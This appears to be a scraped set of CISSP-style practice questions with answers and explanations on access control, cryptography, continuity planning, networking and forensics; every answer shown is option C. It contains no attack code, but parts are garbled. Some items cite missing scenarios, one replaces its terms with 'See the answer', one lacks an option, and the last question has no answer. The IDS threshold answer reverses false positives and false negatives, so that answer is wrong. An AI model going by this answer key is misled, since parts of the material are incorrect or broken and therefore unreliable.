Trent is the new manager of his company's internal software development department. He has been told by his management that the group needs to be compliant with the international standard that provides guidance to organizations in integrating security into the processes used for managing their applications. His new boss told him that he should join and get familiar with the Open Web Application Security Project (OWASP), and Trent just received an e-mail stating that one of the company's currently deployed applications has a zero-day vulnerability. Which of the following is most likely the standard Trent's company wants to comply with? A. ISO/IEC 27005 B. ISO/IEC 27001 C. ISO/IEC 27034 D. BS 7799

C. ISO/IEC 27034 is the international standard that provides guidance to organizations in integrating security to the processes used for managing their applications. It is applicable to in-house developed applications, applications acquired from third parties, and where the development or the operation of the application is outsourced.

You are looking to implement an access control on your system's resources. The steps of your access control model should follow which logical flow? A. Identification, Authorization, Authentication. B. Authorization, Identification, Authentication. C. Identification, Authentication, Authorization. D. Identification, Accountability, Authorization.

C. Identification, Authentication, Authorization.

John is responsible for providing a weekly report to his manager outlining the week's security incidents and mitigation steps. What steps should he take if a report has no information? A. Send his manager an e-mail telling her so. B. Deliver last week's report and make sure it's clearly dated. C. Deliver a report that states "No output." D. Don't do anything.

C. If a report has no information (nothing to report), it should state, "No output." This ensures that the manager is aware that there is no information to report and that John isn't just slacking in his responsibilities.

Which of the following best describes the most critical problem with "running as root"? A. If an administrator always logs in as a privileged user, any mistake that they make may critically misconfigure or destabilize the system. B. If all administrators log in as "root" or "administrator," it can be impossible to audit which administrator took which action or made which changed. C. If an administrator is tricked by attackers into executing malicious software, that software will run with the administrative level of privilege, which is commonly system level. D. "Running as root" implies that the system is a Unix/Linux system, which is much more complex to secure than a Windows server.

C. If an administrator is tricked by attackers into executing malicious software, that software will run with the administrative level of privilege, which is commonly system level.

Which of the following best describes how an address bus and a data bus are used for instruction execution? A. The CPU sends a "fetch" request on the data bus, and the data residing at the requested address is returned on the address bus. B. The CPU sends a "get" request on the address bus, and the data residing at the requested address is returned on the data bus. C. The CPU sends a "fetch" request on the address bus, and the data residing at the requested address is returned on the data bus. D. The CPU sends a "get" request on the data bus, and the data residing at the requested address is returned on the address bus.

C. If the CPU needs to access some data, either from memory or from an I/O device, it sends a "fetch" request on the address bus. The fetch request contains the address of where the needed data is located. The circuitry associated with the memory or I/O device recognizes the address the CPU sent down the address bus and instructs the memory or device to read the requested data and put it on the data bus. So the address bus is used by the CPU to indicate the location of the needed information, and the memory or I/O device responds by sending the information that resides at that memory location through the data bus.

George is responsible for setting and tuning the thresholds for his company's behavior-based IDS. Which of the following outlines the possibilities of not doing this activity properly? A. If the threshold is set too low, nonintrusive activities are considered attacks (false positives). If the threshold is set too high, malicious activities are not identified (false negatives). B. If the threshold is set too low, nonintrusive activities are considered attacks (false negatives). If the threshold is set too high, malicious activities are not identified (false positives). C. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too low, malicious activities are not identified (false negatives). D. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too high, malicious activities are not identified (false negatives).

C. If the threshold is set too high, nonintrusive activities are considered attacks (false positives). If the threshold is set too low, malicious activities are not identified (false negatives).

What condition allows a buffer overflow to happen? A. Code that makes improper user of Random Access Memory. B. Improper use of discretionary access control lists. C. Improper checks in code with regard to the size of input data. D. Sending large amounts of data over a network.

C. Improper checks in code with regard to the size of input data.

Which option best describes the difference between HMAC and CBC-MAC? A. HMAC creates a message digest and is used for integrity; CBC-MAC is used to encrypt blocks of data for confidentiality. B. HMAC uses a symmetric key and a hashing algorithm; CBC-MAC uses the first block for the checksum. C. HMAC provides integrity and data origin authentication; CBC-MAC uses a block cipher for the process of creating a MAC. D. HMAC encrypts a message with a symmetric key and then puts the result through a hashing algorithm; CBC-MAC encrypts the whole message.

C. In an HMAC operation, a message is concatenated with a symmetric key and the result is put through a hashing algorithm. This provides integrity and system or data authentication. CBC-MAC uses a block cipher to create a MAC, which is the last block of ciphertext.

Phishing and pharming are similar. Which of the following correctly describes the difference between phishing and pharming? A. Personal information is collected from victims through legitimate-looking websites in phishing attacks, while personal information is collected from victims via e-mail in pharming attacks. B. Phishing attacks point e-mail recipients to a form where victims input personal information, while pharming attacks use pop-up forms at legitimate websites to collect personal information from victims. C. Victims are pointed to a fake website with a domain name that looks similar to a legitimate site's domain name in a phishing attack, while victims are directed to a fake website as a result of a legitimate domain name being incorrectly translated by the DNS server in a pharming attack. D. Phishing is a technical attack, while pharming is a type of social engineering.

C. In both phishing and pharming, attackers can create websites that look very similar to legitimate sites in an effort to collect personal information from victims. In a phishing attack, attackers can provide URLs with domain names that look very similar to the legitimate site's address. For example, www.amazon.com might become www.amzaon.com. Or use a specially placed @ symbol. For example, [email protected] would actually take the victim to the website notmsn.com and provide the username of www.msn.com to this website. The username www.msn.com would not be a valid username for notmsn.com, so the victim would just be shown the home page of notmsn.com. Now, notmsn.com is a nefarious site created to look and feel just like www.msn.com. The victim feels he is at the legitimate site and logs in with his credentials. In a pharming attack, the victim is given a legitimate domain name, but that domain name is redirected to the attacker's website as a result of DNS poisoning. When the DNS server is poisoned to carry out a pharming attack, the records have been changed so that instead of sending the correct IP address for www.logicalsecurity.com, it sends the IP address of a legitimate-looking, but fake, website created by the attacker.

Don is a senior manager of an architectural firm. He has just found out that a key contract was renewed, allowing the company to continue developing an operating system that was idle for several months. Excited to get started, Don begins work on the operating system privately, but cannot tell his staff until the news is announced publicly in a few days. However, as Don begins making changes in the software, various staff members notice changes in their connected systems, even though they work in a lower security level. What kind of model could be used to ensure this does not happen? A. Biba B. Bell-LaPadula C. Noninterference D. Clark-Wilson

C. In this example, lower-ranked staffers could have deduced that the contract had been renewed by paying attention to the changes in their systems. The noninterference model addresses this specifically by dictating that no action or state in higher levels can impact or be visible to lower levels. In this example, the staff could learn something indirectly or infer something that they do not have a right to know yet.

If Josh is correct in his assumptions, which of the following best describes the vulnerability, threat, and exposure, respectively? A. E-mail server is hardened, an entity could exploit programming code flaw, server is compromised and leaking data. B. E-mail server is not patched, an entity could exploit a vulnerability, server is hardened. C. E-mail server misconfiguration, an entity could exploit misconfiguration, server is compromised and leaking data. D. DMZ firewall misconfiguration, an entity could exploit misconfiguration, internal e-mail server is compromised.

C. In this situation the e-mail server most likely is misconfigured or has a programming flaw that can be exploited. Either of these would be considered a vulnerability. The threat is that someone would find out about this vulnerability and exploit it. In this scenario since the server is compromised, it is the item that is providing exposure to the company. This exposure is allowing sensitive data to be accessed in an unauthorized manner.

Next-generation firewalls combine the best attributes of other types of firewalls. Which of the following is not a common characteristic of these firewall types? A. Integrated intrusion prevention system B. Sharing signatures with cloud-based aggregators C. Automated incident response D. High cost

C. Incident response typically requires humans in the loop. Next-generation firewalls (NGFWs) do not completely automate the process of responding to security incidents. NGFWs typically involve integrated IPS and signature sharing capabilities with cloud-based aggregators, but are also significantly more expensive than other firewall types.

If different user groups with different security access levels need to access the same information, which of the following actions should management take? A. Decrease the security level on the information to ensure the accessibility and usability of the information. B. Require specific written approval each time an individual needs to access the information. C. Increase the security controls on the information. D. Decrease the classification label on the information.

C. Increase the security controls on the information.

Which of the following will not be identified by a business impact analysis? A. areas that would suffer the greatest financial or operational loss in the event of a disaster. B. systems critical to the survival of the enterprise. C. individuals to be contacted during a disaster. D. The outage time that can be tolerated by the enterprise as a result of a disaster.

C. Individuals to be contacted during a disaster.

Brad is a security manager at Thingamabobs, Inc. He is preparing a presentation for his company's executives on the risks of using instant messaging (IM) and his reasons for wanting to prohibit its use on the company network. Which of the following should not be included in his presentation? A. Sensitive data and files can be transferred from system to system over IM. B. Users can receive information—including malware—from an attacker posing as a legitimate sender. C. IM use can be stopped by simply blocking specific ports on the network firewalls. D. A security policy is needed specifying IM usage restrictions.

C. Instant messaging (IM) allows people to communicate with one another through a type of real-time and personal chat room. It alerts individuals when someone who is on their "buddy list" has accessed the intranet/Internet so that they can send text messages back and forth in real time. The technology also allows for files to be transferred from system to system. The technology is made up of clients and servers. The user installs an IM client (AOL, ICQ, Yahoo Messenger, and so on) and is assigned a unique identifier. This user gives out this unique identifier to people whom she wants to communicate with via IM. Blocking specific ports on the firewalls is not usually effective because the IM traffic may be using common ports that need to be open (HTTP port 80 and FTP port 21). Many of the IM clients autoconfigure themselves to work on another port if their default port is unavailable and blocked by the firewall.

Interface testing could involve which of the following? A. The application programming interface (API) B. The graphical user interface (GUI) C. Both of the above D. None of the above

C. Interface testing covers the exchange points within different components of the system. The API is the exchange point between the system and the libraries it leverages, while the GUI is the exchange point between the system and the users. Testing either of these would constitute an interface test.

Which of the following technologies integrates previously independent security solutions with the goal of providing simplicity, centralized control, and streamlined processes? A. Network convergence B. Security as a service C. Unified threat management D. Integrated convergence management

C. It has become very challenging to manage the long laundry list of security solutions almost every network needs to have in place. The list includes, but is not limited to, firewalls, antimalware, antispam, IDS\IPS, content filtering, data leak prevention, VPN capabilities, and continuous monitoring and reporting. Unified threat management (UTM) appliance products have been developed that provide all (or many) of these functionalities in a single network appliance. The goals of UTM are simplicity, streamlined installation and maintenance, centralized control, and the ability to understand a network's security from a holistic point of view.

For evidence to be legally admissible, it must be relevant, complete, sufficient, and reliably obtained. Which characteristic refers to the evidence having a reasonable and sensible relationship to the findings? A. Complete B. Reliable C. Relevant D. Sufficient

C. It is important that evidence be admissible, relevant, complete, sufficient, and reliable to the case at hand. These characteristics of evidence provide a foundation for a case and help ensure that the evidence is legally permissible. For evidence to be authentic, or relevant, it must have a reasonable and sensible relationship to the findings. If a judge rules that a person's past traffic tickets cannot be brought up in a murder trial, this means the judge has ruled that the traffic tickets are not relevant to the case at hand. Thus, the prosecuting lawyer cannot even mention them in court. In addition, authentic evidence must be original; that is, it cannot be a copy or a summary of the original.

It is important to deal with the issue of "reasonable expectation of privacy" (REP) when it comes to employee monitoring. In the U.S. legal system, the expectation of privacy is used when defining the scope of the privacy protections provided by the A. Federal Privacy Act B. PATRIOT Act C. Fourth Amendment of the Constitution D. Bill of Rights

C. It is important to deal with the issue of "reasonable expectation of privacy" (REP) when it comes to employee monitoring. In the U.S. legal system the expectation of privacy is used when defining the scope of the privacy protections provided by the Fourth Amendment of the Constitution. If it is not specifically explained to an employee that monitoring is possible and/or probable, when the monitoring takes place he could claim that his privacy rights have been violated and launch a civil suit against a company.

Sally is responsible for key management within her organization. Which of the following incorrectly describes a principle of secure key management? A. keys should be backed up or escrowed in case of emergencies. B. The more a key is used, the shorter its lifetime should be. C. less secure data allows for a shorter key lifetime. D. keys should be stored and transmitted by secure means.

C. Key management is critical for proper protection. Part of key management is determining the lifespan of keys. The key's lifetime should correspond with the sensitivity of the data it is protecting. Less secure data may allow for a longer key lifetime, whereas more sensitive data might require a shorter key lifetime. Keys should be properly destroyed when their lifetime comes to an end. The processes of changing and destroying keys should be automated and hidden from the user. They should be integrated into software or the operating system. It only adds complexity and opens the doors for more errors when processes are done manually and depend upon end users to perform certain functions.

Which of the following is true about key risk indicators (KRIs)? A. They tell managers where an organization stands with regard to its goals. B. They are inputs to the calculation of single loss expectancy (SLE). C. They tell managers where an organization stands with regard to its risk appetite. D. An interpretation of one or more metrics that describes the effectiveness of the ISMS.

C. Key risk indicators (KRIs) allow managers to understand when specific activities of the organization are moving it toward a higher level of risk. They are useful to understanding changes and managing the overall risk.

Some organizations over-issue privileged access to ensure that users can have access to devices in emergency situations or unconventional scenarios. This practice violates what standard security principle? A. Separation of duties. B. job rotation C. Least Privilege D. Due Diligence.

C. Least Privilege

Which of the following is a control that greg's team could implement to address the network administrator's issue? A. secondary feeder line. B. Insulated grounded wiring C. Line conditioner. D. Generator.

C. Line conditioner.

Sue needs to identify a storage system technology that reduces both wear on the drives and also reduces power consumption. Which of the following technologies is the best fit for these types of requirements? A. RAIT B. RAID C. MAID D. TAT

C. MAID

Kirk is a software developer who is dilligently writing code for a new program. To save time, he creates a hidden access point within the program so that he can immediately begin work and bypass the security controls. Kirk has created a mechanism which can be called any of the following terms, except: A. maintenance hook. B. backdoor C. malware. D. Trapdoor.

C. Malware.

Todd documents several fraud opportunities that the employees have at the financial institution so that management understands these risks and allocates the funds and resources for his suggested solutions. Which of the following best describes the control Todd should put into place to be able to carry out fraudulent investigation activity? A. Separation of duties B. Rotation of duties C. Mandatory vacations D. Split knowledge

C. Mandatory vacations

When an organization splits naming zones, the names of its hosts that are accessible only from an intranet are hidden from the Internet. Which of the following best describes why this is done? A. To prevent attackers from accessing servers B. To prevent the manipulation of the hosts file C. To avoid providing attackers with valuable information that can be used to prepare an attack D. To avoid providing attackers with information needed for cyber squatting

C. Many companies have their own internal DNS servers to resolve their internal hostnames. These companies usually also use the DNS servers at their ISPs to resolve hostnames on the Internet. An internal DNS server can be used to resolve hostnames on the entire network, but usually more than one DNS server is used so that the load can be split up and so that redundancy and fault tolerance are in place. Within DNS servers, networks are split into zones. One zone may contain all hostnames for the marketing and accounting departments, and another zone may contain hostnames for the administration, research, and legal departments. It is a good idea to split DNS zones when possible so that the names of hosts that are accessible only from an intranet are not visible from the Internet. This information is valuable to an attacker who is planning an attack because it can lead to other information, such as the network structure, organizational structure, or server operating systems.

Robert is responsible for implementing a common architecture used when customers need to access confidential information through Internet connections. Which of the following best describes this type of architecture? A. Two-tiered model B. Screened subnet C. Three-tiered model D. Public and private DNS zones

C. Many of today's e-commerce architectures use a three-tiered architecture approach. The three-tier architecture is a client/server architecture in which the user interface, functional process logic, and data storage run as independent components that are developed and maintained, often on separate platforms. The three-tier architecture allows for any one of the tiers to be upgraded or modified as needed without affecting the other two tiers because of its modularity. In the case of e-commerce, the presentation layer is a front-end web server that users interact with. It can serve both static and cached dynamic content. The business logic layer is where the request is reformatted and processed. This is commonly a dynamic content processing and generation-level application server. The data storage is where the sensitive data is held. It is a back-end database that holds both the data and the database management system software that is used to manage and provide access to the data. The separate tiers may be connected with middleware and run on separate physical servers.

What is the most important reason war dialing is still a concern for modern security assessments? A. free tools exist that make it easy for an attacker to scan huge blocks of phone numbers. B. Some tools are relatively sophisticated and can fingerprint the system that answer, enabling further automation. C. Many organizations still employ modems for backup communications, in a way that is not well secured. D. modern, advanced private branch exchanges (PBXs) can make an attacker's job even easier through telephony diagnostic tools.

C. Many organizations still employ modems for backup communications, in a way that is not well secured.

Why should employers make sure employees take their vacations? A. They have a legal obligation. B. It is part of due diligence. C. It is a way for fraud to be uncovered. D. To ensure the employee does not get burnt out.

C. Many times, employees who are carrying out fraudulent activities do not take the vacation they have earned because they do not want anyone to find out what they have been doing. Forcing employees to take vacations means that someone else has to do that person's job and can possibly uncover any misdeeds.

Which of the following best describes why there was a performance issue in the context of the scenario? A. bloated programming code B. i/o and memory location procedures. C. mode transitions. D. Data and address bus architecture.

C. Mode Transitions.

Which of the following does NOT correctly describe a directory service? A. It manages objects within a directory by using namespaces. B. It enforces security policy by carrying out access control and identity management functions. C. It assigns namespaces to each object in databases that are based on the X.509 standard and are accessed by LDAP. D. It allows an administrator to configure and manage how identification takes place within the network.

C. Most enterprises have some type of directory that contains information pertaining to the company's network resources and users. Most directories follow a hierarchical database format, based on the X.500 standard (not X.509), and a type of protocol, as in Lightweight Directory Access Protocol (LDAP), that allows subjects and applications to interact with the directory. Applications can request information about a particular user by making an LDAP request to the directory, and users can request information about a specific resource by using a similar request. A directory service assigns distinguished names (DNs) to each object in databases based on the X.500 standard that are accessed by LDAP. Each distinguished name represents a collection of attributes about a specific object and is stored in the directory as an entry.

What is one of the first steps in developing a business continuity plan? A. Identify a backup solution. B.. Perform a simulation test. C. Perform a business impact analysis. D. Develop a business resumption plan.

C. Perform a business impact analysis.

Rebecca is an internal auditor for a large retail company. The company has a number of web applications that run critical business processes with customers and partners around the world. Her company would like to ensure the security of technical controls on these processes. Which of the following would not be a good approach to auditing these technical controls? A. Log reviews B. Code reviews C. Personnel background checks D. Misuse case testing

C. Personnel background checks are a common administrative (not technical) control. This type of audit would have nothing to do with the web applications themselves. The other three options (log reviews, code reviews, misuse case testing) are typical ways in which we verify the effectiveness of our technical controls.

June is creating a security awareness program to inform the workforce of a change in security . policy. Which stage of the common development process of security policy is June in? A. initial and evaluation. B. Development. C. Publication. D. Implementation

C. Publication.

Diane has to brief her CIO on the best product and protocol to use for the company's centralized remote access control technology. Which of the following are true statements pertaining to the more appropriate use of TACACS+ versus RADIUS? A. TACACS+ is best if an environment only needs simplistic username/password authentication and RADIUS is better for environments that require more complex and tighter controls. C. RADIUS is best if an environment only needs simplistic username/password authentication and TACACS+ is better for environments that require more complex and tighter controls. D. TACACS+ allows for peer to peer relationship between the client and server, and RADIUS works in a purely client/server model.

C. RADIUS is best if an environment only needs simplistic username/password authentication and TACACS+ is better for environments that require more complex and tighter controls.

Which of the following has correct RAID level mappings? A. Raid 3 - block-level parity. B. RAID 4 - byte-level parity. C. Raid 5 - interleave parity. D. Raid 1 - hamming code parity.

C. Raid 5 - interleave parity.

How does water suppress a fire? A. modified the chemical combustion elements. B. reduces the fuel C. reduces the temperature. D. reduces the oxygen.

C. Reduces the temperature.

Which of the following best describes the mitigation of data remanence by a degaussing destruction process? A. Replacing the 1's and 0's that represent data on storage media with random or fixed patterns of 1's and 0's B. Converting the 1's and 0's that represent data with the output of a cryptographic function C. Removing or reducing the magnetic field patterns on conventional disk drives or tapes D. Exposing storage media to caustic or corrosive chemicals that render it unusable

C. Removing or reducing the magnetic field patterns on conventional disk drives or tapes

Which of the following statements is correct regarding the designated retention period for data? A. Business documents (e.g. meeting minutes) must be retained for 7 years. B. invoices must be retained for 5 years. C. Requirements may vary, so consult an attorney. D. There are no designated standards, only best practice.

C. Requirements may vary, so consult an attorney.

Based on quantitative calculations, the company has determined that by implementing a better firewall, they will reduce their risk exposure by 80 percent. What does the other 20 percent represent? A. Single loss expectancy B. Annualized loss expectancy. C. Residual risk. D. Vulnerability percentage.

C. Residual risk.

Tape library management is an example of operations security through which of the following? A. Archival retention. B. Reviewing clipping levels. C. Resource protection. D. Change management.

C. Resource protection.

All of the following attacks are considered technical attacks except: A. differential cryptanalysis. B. Linear cryptanalysis. C. Rubber hose cryptanalysis D. Algebraic cryptanalysis

C. Rubber hose cryptanalysis

What is the imaginary boundary that separates components that maintain security from components that are not security related? A. Reference monitor B. Security kernel C. Security perimeter D. Security policy

C. Security perimeter

Alex works for a chemical distributor that assigns employees tasks that separate their duties and routinely rotates job assignments. Which of the following best describes the differences between these countermeasures? A. They are the same thing with different titles. B. They are administrative controls that enforce access control and protect the company's resources. C. Separation of duties ensures that one person cannot perform a high-risk task alone, and job rotation can uncover fraud because more than one person knows the tasks of a position. D. Job rotation ensures that one person cannot perform a high-risk task alone, and separation of duties can uncover fraud because more than one person knows the tasks of a position.

C. Separation of duties and job rotation are two security controls commonly used within companies to prevent and detect fraud. Separation of duties is put into place to ensure that one entity cannot carry out a task that could be damaging or risky to the company. It requires two or more people to come together to do their individual tasks to accomplish the overall task. Rotation of duties helps ensure that one person does not stay in one position for a long period of time because he may end up having too much control over a segment of the business. Such total control could result in fraud, data modification, and misuse of resources.

John does systems maintenance for his department and is also responsible for performing the operational security audit once a year. What security management principle is John violating? A. Operational integrity. B. collusion C. Separation of duties. D. Nondisclosure.

C. Separation of duties.

After a computer forensic investigator seizes a computer during a crime investigation, what is the next step? A. Label and put it into a container, and then label the container B. Dust the evidence for fingerprints C. Make an image copy of the disks D. Lock the evidence in the safe

C. Several steps need to be followed when gathering and extracting evidence from a scene. Once a computer has been confiscated, the first thing the computer forensics team should do is make an image of the hard drive. The team will work from this image instead of the original hard drive so that the original stays in a pristine state and the evidence on the drive is not accidentally corrupted or modified.

Mike's company has just been hired to do a one-time contract certification of a newly-implemented network center for a small dispatching company. as part of the contract, Mike includes a checklist of the tasks his team will perform during the certification. Which task below would not belong on the list? A. Test network connectivity to all specified devices. B. Verify security controls are functioning properly. C. Sign off on the platform as meeting all security objectives stated. D. Verify that auditing mechanisms function properly.

C. Sign off on the platform as meeting all security objectives stated.

Which of the following is an XML-based protocol that defines the schema of how web service communication takes place over HTTP transmissions? A. Service-Oriented Protocol B. Active X Protocol C. Simple Object Access Protocol D. Web Ontology Language

C. Simple Object Access Protocol (SOAP) enables programs running on different operating systems and written in different programming languages to communicate over web-based communication methods. SOAP is an XML-based protocol that encodes messages in a web service environment. SOAP actually defines an XML schema or a structure of how communication is going to take place. The SOAP XML schema defines how objects communicate directly.

Roger calls into a customer service center and pretends to be affiliated with the company in order to gain secured information. What tactic is Roger using? A. Tailgating. B. Dumpster diving. C. Social Engineering. D. Sniffing.

C. Social Engineering.

What set of protocols corresponds to the following layers: application. data link, network, and transport? A. FTP, ARP, TCP and UDP B. FTP, ICMP, IP, and UDP C. TFTP, ARP, IP, and UDP D. TFTP, RARP, IP, and ICMP

C. TFTP, ARP, IP, and UDP

Several teams should be involved in carrying out the business continuity plan. Which team is responsible for starting the recovery of the original site? A. Damage assessment team B. BCP team C. Salvage team D. Restoration team

C. The BCP coordinator should have an understanding of the needs of the company and the types of teams that need to be developed and trained. Employees should be assigned to the specific teams based on their knowledge and skill set. Each team needs to have a designated leader, who will direct the members and their activities. These team leaders will be responsible not only for ensuring that their team's objectives are met, but also for communicating with each other to make sure each team is working in parallel phases. The salvage team is responsible for starting the recovery of the original site. It is also responsible for backing up data from the alternate site and restoring it within the new facility, carefully terminating contingency operations, and securely transporting equipment and personnel to the new facility.

What type of rating system is used within the Common Criteria structure? A. PP B. EPL C. EAL D. A-D

C. The Common Criteria uses a different assurance rating system than the previously used criteria. It has packages of specifications that must be met for a product to obtain the corresponding rating. These ratings and packages are called Evaluation Assurance Levels (EALs).

What type of rating is used within the Common Criteria framework? A. PP B. EPL C. EAL D. A-D

C. The Common Criteria uses a different assurance rating system than the previously used criteria. It has packages of specifications that must be met for a product to obtain the corresponding rating. These ratings and packages are called Evaluation Assurance Levels (EALs). Once a product achieves any type of rating, customers can view this information on an Evaluated Products List (EPL

Use the following scenario to answer Questions 28-29. Robbie is the security administrator of a company that needs to extend its remote access functionality. Employees travel around the world, but still need to be able to gain access to corporate assets such as databases, servers, and network-based devices. Also, while the company has had a VoIP telephony solution in place for two years, it has not been integrated into a centralized access control solution. Currently the network administrators have to maintain access control separately for internal resources, external entities, and VoIP end systems. Robbie has also been asked to look into some suspicious e-mails that the CIO's secretary has been receiving, and her boss has asked her to remove some old modems that are no longer being used for remote dial-in purposes. Which of the following is the best remote access technology for this situation? A. RADIUS B. TACACS+ C. Diameter D. Kerberos

C. The Diameter protocol extends the RADIUS protocol to allow for various types of authentication to take place with a variety of different technologies (PPP, VoIP, Ethernet, etc.). It has extensive flexibility and allows for the centralized administration of access control.

Larry is a seasoned security professional and knows the potential dangers associated with using an ISP's DNS server for Internet connectivity. When Larry stays at a hotel or uses his laptop in any type of environment he does not fully trust, he updates values in his HOSTS file. Which of the following best describes why Larry carries out this type of task? A. Reduces the risk of an attacker sending his system a corrupt ARP address that points his system to a malicious website B. Ensures his host-based IDS is properly updated C. Reduces the risk of an attacker sending his system an incorrect IP address-to-host mapping that points his system to a malicious website D. Ensures his network-based IDS is properly synchronized with his host-based IDS

C. The HOSTS file resides on the local computer and can contain static hostname-to-IP mapping information. If you do not want your system to query a DNS server, you can add the necessary data in the HOSTS file, and your system will first check its contents before reaching out to a DNS server. Some people use these files to reduce the risk of an attacker sending their system a bogus IP address that points them to a malicious website.

Which standard should Jack suggest to his boss for compliance? A. BS 17799 B. ISO/IEC 27004 C. ISO/IEC 27799 D. BS 7799:2011

C. The ISO/IEC 27799 is a guideline for information security management in health organizations. It deals with how organizations that store and process sensitive medical information should protect it.

Which of the following protocols or set of protocols is used in Voice over IP (VoIP) for caller identification? A. Real-time Transport Protocol (RTP) and/or Secure Real-time Transport Protocol (SRTP) B. Real-time Transport Protocol (RTP) and Real-time Transport Control Protocol (RTCP) C. Session Initiation Protocol (SIP) D. Public Switched Telephony/Phone Branch Exchange (PSTN/PBX)

C. The Session Initiation Protocol is commonly used for all VoIP transactions except the actual media exchange between calling or receiving stations. This includes caller identification and location, call setup and teardown, etc. It is brokered by a mutually trusted third-party system that contains registration information for each station/user.

Which of the following statements does not correctly describe SOAP and Remote Procedure Calls? A. SOAP was designed to overcome the compatibility and security issues associated with Remote Procedure Calls. B. Both SOAP and Remote Procedure Calls were created to enable application-layer communication. C. SOAP enables the use of Remote Procedure Calls for information exchange between applications over the Internet. D. HTTP was not designed to work with Remote Procedure Calls, but SOAP was designed to work with HTTP.

C. The Simple Object Access Protocol (SOAP) was created to use instead of Remote Procedure Calls (RPCs) to allow applications to exchange information over the Internet. SOAP is an XML-based protocol that encodes messages in a web service setup. It allows programs running on different operating systems to communicate over web-based communication methods.

How does TKIP provide more protection for WLAN environments? A. It uses the AES algorithm. B. It decreases the IV size and uses the AES algorithm. C. It adds more keying material. D. It uses MAC and IP filtering.

C. The TKIP protocol actually works with WEP by feeding it keying material, which is data to be used for generating random keystreams. TKIP increases the IV size, ensures it is random for each packet, and adds the sender's MAC address to the keying material.

Brian, a security administrator, is responding to a virus infection. The antivirus application reports that a file has been infected with a dangerous virus and disinfecting it could damage the file. What course of action should Brian take? A. Replace the file with the file saved from the day before. B. Disinfect the file and contact the vendor. C. Restore an uninfected version of the patched file from backup media. D. Back up the data and disinfect the file.

C. The best course of action is to install an uninfected version of a patched file from backup media. Attempts to disinfect the file could corrupt it, and it is important to restore a file that is known to be "clean."

The CA is responsible for revoking certificates when necessary. Which of the following correctly describes a CRL and OCSP? A. The CRL was developed as a more streamlined approach to OCSP. B. OCSP is a protocol that submits revoked certificates to the CRL. C. OCSP is a protocol developed specifically to check the CRL during a certificate validation process. D. CRL carries out real-time validation of a certificate and reports to the OCSP.

C. The certificate authority (CA) is responsible for creating and handing out certificates, maintaining them, and revoking them if necessary. Revocation is handled by the CA, and the revoked certificate information is stored on a certificate revocation list (CRL). This is a list of every certificate that has been revoked. This list is maintained and updated periodically. A certificate may be revoked because the key holder's private key was compromised or because the CA discovered the certificate was issued to the wrong person. If the certificate becomes invalid for some reason, the CRL is the mechanism for the CA to let others know this information. The Online Certificate Status Protocol (OCSP) is being used more and more rather than the cumbersome CRL approach. When using just a CRL, the user's browser must check a central CRL to find out if the certification has been revoked or the CA continually pushes out CRL values to the clients to ensure they have an updated CRL. If OCSP is implemented, it does this work automatically in the background. It carries out real-time validation of a certificate and reports back to the user whether the certificate is valid, invalid, or unknown.

What takes place at the data link layer? A. End-to-end connection B. Dialog control C. Framing D. Data syntax

C. The data link layer, in most cases, is the only layer that understands the environment in which the system is working, whether it be Ethernet, Token Ring, wireless, or a connection to a WAN link. This layer adds the necessary headers and trailers to the frame. Other systems on the same type of network using the same technology understand only the specific header and trailer format used in their data link technology.

After a disaster occurs, a damage assessment needs to take place. Which of the following steps occurs last in a damage assessment? A. Determine the cause of the disaster. B. Identify the resources that must be replaced immediately. C. Declare a disaster. D. Determine how long it will take to bring critical functions back online.

C. The final step in a damage assessment is to declare a disaster. After information from the damage assessment is collected and assessed, it will indicate what teams need to be called to action and whether the BCP actually needs to be activated. The BCP coordinator and team must develop activation criteria before a disaster takes place. After the damage assessment, if one or more of the situations outlined in the criteria have taken place, then the team is moved into recovery mode. Different organizations have different criteria, because the business drivers and critical functions will vary from organization to organization. The criteria may consist of danger to human life, danger to state or national security, damage to facility, damage to critical systems, and estimated value of downtime that will be experienced.

Which of the following best describes the firewall configuration issues Sean's team member is describing? A. Clean-up rule, stealth rule B. Stealth rule, silent rule C. Silent rule, negate rule D. Stealth rule, silent rule

C. The following describes the different firewall rule types: Silent rule Drops "noisy" traffic without logging it. This reduces log sizes by not responding to packets that are deemed unimportant. Stealth rule Disallows access to firewall software from unauthorized systems. Cleanup rule The last rule in the rule base, which drops and logs any traffic that does not meet the preceding rules. Negate rule Used instead of the broad and permissive "any rules." Negate rules provide tighter permission rights by specifying what system can be accessed and how.

Brute-force attacks have increased because _____ A. The increased use of permutations and transpositions in algorithms. B. As algorithms get stronger, they get less complex, and thus more susceptible to attacks. C. The increase in processor speed and power D. The reduction in key length over time.

C. The increase in processor speed and power

Which of the following statements is true about the information life cycle? A. The information life cycle begins with its archival and ends with its classification. B. Most information must be retained indefinitely. C. The information life cycle begins with its acquisition/creation and ends with its disposal/destruction. D. Preparing information for use does not typically involve adding metadata to it.

C. The information life cycle begins with its acquisition/creation and ends with its disposal/destruction.

Which of the following has the correct term-to-definition mapping? See the answer Performed with tools that cycle through many possible character, number, and symbol combinations to uncover a password. See the answer Files of thousands of words are compared to the user's password until a match is found. See the answer An attacker falsely convinces an individual that she has the necessary authorization to access specific resources. Rainbow table: An attacker uses a table that contains all possible passwords already in a hash format. A. i, ii B. i, ii, iv C. i, ii, iii, iv D. i, ii, iii

C. The list has all the correct term-to-definition mappings.

Which of the following best describes the types of languages and/or protocols that Harry needs to ensure are implemented? A. Security Assertion Markup Language, Extensible Access Control Markup Language, Service Provisioning Markup Language B. Service Provisioning Markup Language, Simple Object Access Protocol, Extensible Access Control Markup Language C. Extensible Access Control Markup Language, Security Assertion Markup Language, Simple Object Access Protocol D. Service Provisioning Markup Language, Security Association Markup Language

C. The most appropriate languages and protocols for the purpose laid out in the scenario are Extensible Access Control Markup Language, Security Assertion Markup Language, and Simple Object Access Protocol. Harry's group is not necessarily overseeing account provisioning, so the Service Provisioning Markup Language is not necessary, and there is no language called "Security Association Markup Language."

Which of the following is the most critical best practice when conducting an internal security audit? A. Take advantage of the logistical flexibility that an internal audit can offer. Ad hoc scheduling makes internal audits much easier to execute than external ones. B. Compensate for the "insider knowledge" advantage of your internal audit team by sharing with them the least amount of information possible, especially with respect to policies, procedures, and configurations. C. Make sure to keep the audit report's audience in mind at all times during the process. The audit report needs to have an impact on not only managers but also operations staff. D. Rely on the defensive team to document what was done successfully against them, including when and how. That way the auditing team doesn't have to get bogged down with documenting all the things that were tried but ultimately didn't work.

